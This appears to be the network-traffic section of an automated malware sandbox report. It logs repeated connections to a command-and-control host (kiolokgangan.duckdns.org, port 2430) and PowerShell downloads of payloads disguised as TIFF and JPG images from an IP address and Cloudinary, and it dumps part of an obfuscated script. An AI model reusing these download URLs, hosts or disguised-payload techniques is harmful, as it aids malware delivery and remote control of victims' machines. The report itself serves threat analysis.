                                                                                                          Dec 17, 2024 07:22:46.966407061 CET243049781192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:47.859646082 CET498082430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:47.979444981 CET243049808192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:47.979588032 CET498082430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:47.984169006 CET498082430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:48.103974104 CET243049808192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:58.332736969 CET243049808192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:58.336072922 CET498082430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:58.336072922 CET498082430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:58.456223011 CET243049808192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:59.343708992 CET498372430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:59.463637114 CET243049837192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:59.463723898 CET498372430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:59.467046976 CET498372430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:59.586787939 CET243049837192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:09.838635921 CET243049837192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:09.838732004 CET498372430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:09.838810921 CET498372430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:09.958590031 CET243049837192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:10.844146013 CET498642430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:10.963927984 CET243049864192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:10.964006901 CET498642430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:10.967617035 CET498642430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:11.087666988 CET243049864192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:21.437998056 CET243049864192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:21.438169003 CET498642430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:21.438169003 CET498642430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:21.558068037 CET243049864192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:22.454785109 CET498932430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:22.574636936 CET243049893192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:22.574728012 CET498932430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:22.578572989 CET498932430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:22.698386908 CET243049893192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:33.104496956 CET243049893192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:33.104615927 CET498932430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:33.104684114 CET498932430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:33.224492073 CET243049893192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:34.118536949 CET499202430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:34.238428116 CET243049920192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:34.238583088 CET499202430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:34.248363972 CET499202430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:34.368160963 CET243049920192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:44.733999968 CET243049920192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:44.734225035 CET499202430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:44.734225035 CET499202430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:44.854085922 CET243049920192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:46.093364000 CET499482430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:46.213149071 CET243049948192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:46.216229916 CET499482430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:46.219773054 CET499482430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:46.339819908 CET243049948192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:56.594641924 CET243049948192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:56.594727039 CET499482430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:56.594820023 CET499482430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:56.715922117 CET243049948192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:57.609664917 CET499772430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:57.729800940 CET243049977192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:23:57.731189013 CET499772430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:57.734522104 CET499772430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:23:57.854485989 CET243049977192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:08.295869112 CET243049977192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:08.295942068 CET499772430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:08.296010971 CET499772430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:08.416305065 CET243049977192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:09.316226959 CET499952430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:09.438175917 CET243049995192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:09.440318108 CET499952430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:09.514792919 CET499952430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:09.634848118 CET243049995192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:19.710649014 CET243049995192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:19.710724115 CET499952430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:19.710786104 CET499952430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:19.830518961 CET243049995192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:20.719507933 CET499962430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:20.839426041 CET243049996192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:20.839529037 CET499962430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:20.843154907 CET499962430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:20.962997913 CET243049996192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:31.234761953 CET243049996192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:31.236429930 CET499962430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:31.236490011 CET499962430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:31.356398106 CET243049996192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:32.250298977 CET499972430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:32.370372057 CET243049997192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:32.370615005 CET499972430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:32.374676943 CET499972430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:32.494487047 CET243049997192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:42.848412037 CET243049997192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:42.850727081 CET499972430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:42.850727081 CET499972430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:42.970622063 CET243049997192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:43.868483067 CET499982430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:43.988344908 CET243049998192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:43.988522053 CET499982430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:43.992369890 CET499982430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:44.112276077 CET243049998192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:54.399898052 CET243049998192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:54.404510021 CET499982430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:54.407455921 CET499982430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:54.527132988 CET243049998192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:55.744164944 CET499992430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:55.863951921 CET243049999192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:24:55.864063025 CET499992430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:55.867364883 CET499992430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:24:55.987055063 CET243049999192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:06.333511114 CET243049999192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:06.336610079 CET499992430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:06.336610079 CET499992430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:06.456408978 CET243049999192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:07.344381094 CET500002430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:07.464150906 CET243050000192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:07.464261055 CET500002430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:07.467294931 CET500002430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:07.587074995 CET243050000192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:17.732012987 CET243050000192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:17.732093096 CET500002430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:17.732263088 CET500002430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:17.851958990 CET243050000192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:18.735387087 CET500012430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:18.855190039 CET243050001192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:18.856645107 CET500012430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:18.860223055 CET500012430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:18.980011940 CET243050001192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:29.396924019 CET243050001192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:29.400872946 CET500012430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:29.400872946 CET500012430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:29.520561934 CET243050001192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:30.422470093 CET500032430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:30.542216063 CET243050003192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:30.542373896 CET500032430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:30.545703888 CET500032430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:30.665335894 CET243050003192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:40.898407936 CET243050003192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:40.898648024 CET500032430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:40.898648024 CET500032430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:41.018698931 CET243050003192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:41.906831026 CET500042430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:42.026823997 CET243050004192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:42.028697968 CET500042430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:42.032382965 CET500042430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:42.152203083 CET243050004192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:52.532102108 CET243050004192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:52.532171965 CET500042430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:52.532258987 CET500042430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:52.652089119 CET243050004192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:53.547576904 CET500052430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:53.667759895 CET243050005192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:53.668185949 CET500052430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:53.672395945 CET500052430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:53.792830944 CET243050005192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:26:04.033997059 CET243050005192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:26:04.034079075 CET500052430192.168.2.6192.169.69.26
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 17, 2024 07:22:09.204142094 CET6474453192.168.2.61.1.1.1
                                                                                                          Dec 17, 2024 07:22:09.501827002 CET53647441.1.1.1192.168.2.6
                                                                                                          Dec 17, 2024 07:22:32.128817081 CET6400453192.168.2.61.1.1.1
                                                                                                          Dec 17, 2024 07:22:32.266026974 CET53640041.1.1.1192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.857935905 CET6514253192.168.2.61.1.1.1
                                                                                                          Dec 17, 2024 07:22:36.163908958 CET53651421.1.1.1192.168.2.6
                                                                                                          Dec 17, 2024 07:23:45.750161886 CET6387753192.168.2.61.1.1.1
                                                                                                          Dec 17, 2024 07:23:46.091425896 CET53638771.1.1.1192.168.2.6
                                                                                                          Dec 17, 2024 07:24:55.406508923 CET5487053192.168.2.61.1.1.1
                                                                                                          Dec 17, 2024 07:24:55.743204117 CET53548701.1.1.1192.168.2.6
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 17, 2024 07:22:09.204142094 CET192.168.2.61.1.1.10xea36Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:32.128817081 CET192.168.2.61.1.1.10x805dStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:35.857935905 CET192.168.2.61.1.1.10xdc79Standard query (0)kiolokgangan.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:23:45.750161886 CET192.168.2.61.1.1.10x8735Standard query (0)kiolokgangan.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:24:55.406508923 CET192.168.2.61.1.1.10x7f24Standard query (0)kiolokgangan.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 17, 2024 07:22:09.501827002 CET1.1.1.1192.168.2.60xea36No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:09.501827002 CET1.1.1.1192.168.2.60xea36No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:09.501827002 CET1.1.1.1192.168.2.60xea36No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:09.501827002 CET1.1.1.1192.168.2.60xea36No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:09.501827002 CET1.1.1.1192.168.2.60xea36No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:32.266026974 CET1.1.1.1192.168.2.60x805dNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:32.266026974 CET1.1.1.1192.168.2.60x805dNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:22:36.163908958 CET1.1.1.1192.168.2.60xdc79No error (0)kiolokgangan.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:23:46.091425896 CET1.1.1.1192.168.2.60x8735No error (0)kiolokgangan.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 07:24:55.743204117 CET1.1.1.1192.168.2.60x7f24No error (0)kiolokgangan.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                          • res.cloudinary.com
                                                                                                          • paste.ee
                                                                                                          • 74.208.80.248
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.64970774.208.80.248801776C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 07:22:03.015948057 CET331OUTGET /43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                          Host: 74.208.80.248
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 07:22:04.164150000 CET1236INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 06:22:03 GMT
                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                          Last-Modified: Mon, 16 Dec 2024 11:35:21 GMT
                                                                                                          ETag: "259f8-6296193639488"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 154104
                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: image/tiff
                                                                                                          Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 5a 00 4c 00 47 00 4e 00 68 00 4e 00 6c 00 67 00 4b 00 70 00 69 00 68 00 52 00 62 00 6f 00 20 00 3d 00 20 00 22 00 63 00 41 00 6d 00 63 00 47 00 66 00 71 00 6b 00 68 00 55 00 4a 00 4a 00 75 00 64 00 74 00 22 00 0d 00 0a 00 4c 00 4b 00 47 00 4c 00 68 00 6b 00 4b 00 4c 00 47 00 68 00 4c 00 66 00 69 00 69 00 6a 00 20 00 3d 00 20 00 22 00 69 00 4c 00 43 00 6d 00 70 00 5a 00 5a 00 6d 00 70 00 51 00 75 00 4b 00 67 00 50 00 65 00 22 00 0d 00 0a 00 63 00 49 00 4c 00 42 00 4b 00 63 00 6d 00 4a 00 4b 00 65 00 64 00 5a 00 6b 00 64 00 55 00 20 00 3d 00 20 00 22 00 4b 00 4e 00 57 00 47 00 66 00 57 00 63 00 6d 00 74 00 5a 00 6b 00 6e 00 66 00 69 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 47 00 69 00 6c 00 50 00 5a 00 63 00 65 00 62 00 62 00 7a 00 6c 00 50 00 4b 00 68 00 66 00 20 00 3d 00 20 00 22 00 52 00 7a 00 68 00 4b 00 4f 00 68 00 50 00 6a 00 53 00 47 00 57 00 69 00 63 00 63 00 57 00 22 00 0d 00 0a 00 63 00 4e 00 6d 00 64 00 78 00 6c 00 65 00 57 00 66 00 70 00 [TRUNCATED]
                                                                                                          Data Ascii: ZLGNhNlgKpihRbo = "cAmcGfqkhUJJudt"LKGLhkKLGhLfiij = "iLCmpZZmpQuKgPe"cILBKcmJKedZkdU = "KNWGfWcmtZknfiL"GilPZcebbzlPKhf = "RzhKOhPjSGWiccW"cNmdxleWfpLhGOp = "sAWGLmzALmzWmAp"oKNnlGHdBxnqAlC = "xjAzKjiGZKbpjqc"AtNRchmcnJHGzic = "LhcZpJKxBWcAcBr"ckLmKaptAcZhpGW = "ebkKWmAGtWOAPLL"iCLAWWWPRGTGcUi = "iWmWdaUPfKKxacN"LoIppqkhLJfhCiL = "UNLdWJNrsLkARmg"hGNaWCmULiLWNLQ = "keeeLmLWLzobGAU"UzihczZWeINiWlP = "CUdipWLkvcRWakg"KPLbPo
                                                                                                          Dec 17, 2024 07:22:04.164254904 CET224INData Raw: 00 4f 00 4e 00 54 00 6f 00 43 00 4b 00 70 00 4b 00 57 00 20 00 3d 00 20 00 22 00 73 00 66 00 6e 00 6b 00 48 00 62 00 47 00 52 00 6d 00 6b 00 4b 00 4f 00 66 00 47 00 48 00 22 00 0d 00 0a 00 4c 00 6c 00 67 00 57 00 50 00 42 00 6b 00 4c 00 4c 00 6e
                                                                                                          Data Ascii: ONToCKpKW = "sfnkHbGRmkKOfGH"LlgWPBkLLnfrIGu = "GvictpRNLoZCnzK"PAWLqPqRdPmipfG = "civPLmTiOOozmef"KokLO
                                                                                                          Dec 17, 2024 07:22:04.164268970 CET1236INData Raw: 00 6a 00 4b 00 55 00 71 00 50 00 5a 00 78 00 43 00 4a 00 7a 00 20 00 3d 00 20 00 22 00 4f 00 42 00 4e 00 6b 00 4c 00 51 00 65 00 5a 00 4c 00 74 00 57 00 76 00 47 00 4c 00 47 00 22 00 0d 00 0a 00 4b 00 73 00 66 00 71 00 62 00 62 00 4c 00 65 00 41
                                                                                                          Data Ascii: jKUqPZxCJz = "OBNkLQeZLtWvGLG"KsfqbbLeAGWkKob = "LQZmxcdcgBGeAoh"LWdWLtknblWTZLZ = "hsUPnlfhWkjHciQ"tLKgjNQjxKSxHNe
                                                                                                          Dec 17, 2024 07:22:04.164294004 CET1236INData Raw: 00 4f 00 64 00 4c 00 6d 00 57 00 22 00 0d 00 0a 00 63 00 4a 00 70 00 62 00 52 00 70 00 50 00 62 00 57 00 47 00 4f 00 7a 00 4c 00 65 00 69 00 20 00 3d 00 20 00 22 00 4b 00 6c 00 62 00 6f 00 65 00 42 00 64 00 54 00 4f 00 69 00 4c 00 51 00 55 00 68
                                                                                                          Data Ascii: OdLmW"cJpbRpPbWGOzLei = "KlboeBdTOiLQUhW"LpAJWchNLchvoIh = "bkcLNmWRpmLfxak"LcGjKkbZWfLNOBQ = "LLLtOcWzhBNxuWW"
                                                                                                          Dec 17, 2024 07:22:04.164309978 CET1236INData Raw: 00 6f 00 20 00 3d 00 20 00 22 00 4c 00 63 00 73 00 66 00 57 00 5a 00 4a 00 65 00 55 00 47 00 69 00 62 00 6f 00 78 00 61 00 22 00 0d 00 0a 00 4e 00 57 00 6b 00 4c 00 4b 00 6e 00 65 00 69 00 7a 00 68 00 4b 00 4c 00 4b 00 4b 00 6d 00 20 00 3d 00 20
                                                                                                          Data Ascii: o = "LcsfWZJeUGiboxa"NWkLKneizhKLKKm = "UUkcCkirzviLPLW"GiuxatpPLUckZGW = "KJhqCfkdUcbQitL"PmPipGWpmBqCedo = "WceGc
                                                                                                          Dec 17, 2024 07:22:04.164416075 CET1236INData Raw: 00 0a 00 6a 00 4b 00 47 00 57 00 6c 00 63 00 69 00 47 00 61 00 4c 00 5a 00 70 00 65 00 6c 00 70 00 20 00 3d 00 20 00 22 00 5a 00 57 00 4c 00 54 00 57 00 49 00 4c 00 41 00 57 00 69 00 41 00 5a 00 4c 00 75 00 64 00 22 00 0d 00 0a 00 4c 00 6a 00 4c
                                                                                                          Data Ascii: jKGWlciGaLZpelp = "ZWLTWILAWiAZLud"LjLGkRbcQWbOWtG = "hWBZaAfknLORqck"cvJPKkWRbvkuUtP = "ULWoWZWUhpJRbos"KKmKhudoK
                                                                                                          Dec 17, 2024 07:22:04.164439917 CET1236INData Raw: 00 69 00 7a 00 4c 00 78 00 64 00 4b 00 6a 00 47 00 6c 00 6d 00 4c 00 22 00 0d 00 0a 00 51 00 6b 00 55 00 50 00 64 00 6b 00 6e 00 61 00 69 00 5a 00 53 00 4b 00 41 00 4c 00 68 00 20 00 3d 00 20 00 22 00 5a 00 47 00 47 00 6f 00 41 00 41 00 55 00 41
                                                                                                          Data Ascii: izLxdKjGlmL"QkUPdknaiZSKALh = "ZGGoAAUAOpLKKee"GKimxNZAPUAkSWu = "LzRkeWGLWkNlmca"oALSPWqPbckzRoG = "UaLCHeaLKNtr
                                                                                                          Dec 17, 2024 07:22:04.164455891 CET1236INData Raw: 00 4f 00 43 00 4f 00 6f 00 66 00 4e 00 75 00 20 00 3d 00 20 00 22 00 6f 00 62 00 50 00 68 00 69 00 51 00 6c 00 6c 00 66 00 4b 00 61 00 4c 00 55 00 5a 00 75 00 22 00 0d 00 0a 00 4c 00 6d 00 76 00 42 00 5a 00 4b 00 4b 00 47 00 7a 00 7a 00 50 00 6d
                                                                                                          Data Ascii: OCOofNu = "obPhiQllfKaLUZu"LmvBZKKGzzPmPoZ = "WCcNGAskLljtpUp"RpUfWkKiBcioWcf = "jOLISzRSHRhGjLU"PhhmQLvbkmIhGfW =
                                                                                                          Dec 17, 2024 07:22:04.164469957 CET1236INData Raw: 00 41 00 54 00 66 00 4b 00 22 00 0d 00 0a 00 4f 00 69 00 57 00 76 00 65 00 62 00 78 00 74 00 42 00 55 00 4f 00 6d 00 63 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 4c 00 71 00 6b 00 69 00 57 00 70 00 57 00 5a 00 4c 00 4c 00 4e 00 69 00 4c 00 63 00 4b
                                                                                                          Data Ascii: ATfK"OiWvebxtBUOmcKk = "LqkiWpWZLLNiLcK"TtmqWbLzcbiaoWl = "BLWLnWHLAqfbllz"lKncPNLmOpkLfkc = "iBWbaiCaiZhWcuo"iWt
                                                                                                          Dec 17, 2024 07:22:04.164485931 CET1236INData Raw: 00 20 00 22 00 69 00 42 00 4c 00 4e 00 62 00 43 00 47 00 4e 00 4c 00 67 00 70 00 50 00 54 00 62 00 47 00 22 00 0d 00 0a 00 7a 00 5a 00 66 00 4b 00 50 00 4b 00 4c 00 4b 00 73 00 4f 00 51 00 4e 00 4b 00 41 00 70 00 20 00 3d 00 20 00 22 00 4c 00 6c
                                                                                                          Data Ascii: "iBLNbCGNLgpPTbG"zZfKPKLKsOQNKAp = "LlNGWokRqfULLKk"LOuWWqpTWiLLKIp = "KjKoJKLmuAZiGmN"gNnpLoPWpiGdczG = "klCLGG
                                                                                                          Dec 17, 2024 07:22:04.284645081 CET1236INData Raw: 00 42 00 7a 00 42 00 66 00 6a 00 74 00 63 00 5a 00 48 00 4a 00 4a 00 54 00 7a 00 20 00 3d 00 20 00 22 00 41 00 42 00 4b 00 6f 00 68 00 4e 00 64 00 52 00 74 00 63 00 4b 00 4c 00 61 00 41 00 6d 00 22 00 0d 00 0a 00 50 00 78 00 41 00 6b 00 5a 00 6b
                                                                                                          Data Ascii: BzBfjtcZHJJTz = "ABKohNdRtcKLaAm"PxAkZkKQAAzGBPa = "ccBUpPLTdWihbIk"ZGdZcWCaWbGiesH = "bihuRLucqjAUPls"ObUghuKKUKPK


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.649715151.101.1.1374435924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 06:22:10 UTC127OUTGET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1
                                                                                                          Host: res.cloudinary.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 06:22:11 UTC780INHTTP/1.1 200 OK
                                                                                                          Connection: close
                                                                                                          Content-Length: 2469849
                                                                                                          Content-Type: image/jpeg
                                                                                                          Etag: "78bd258abedd7787714b5d9c33eb9212"
                                                                                                          Last-Modified: Fri, 13 Dec 2024 00:49:52 GMT
                                                                                                          Date: Tue, 17 Dec 2024 06:22:11 GMT
                                                                                                          Strict-Transport-Security: max-age=604800
                                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                          Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-17T06:22:11.009Z;desc=hit,rtt;dur=174,content-info;desc="width=1920,height=1080,bytes=2469849,format=\"jpg\",o=1,crt=1734050991,ef=(17)"
                                                                                                          Server: Cloudinary
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Accept-Ranges: bytes
                                                                                                          X-Content-Type-Options: nosniff
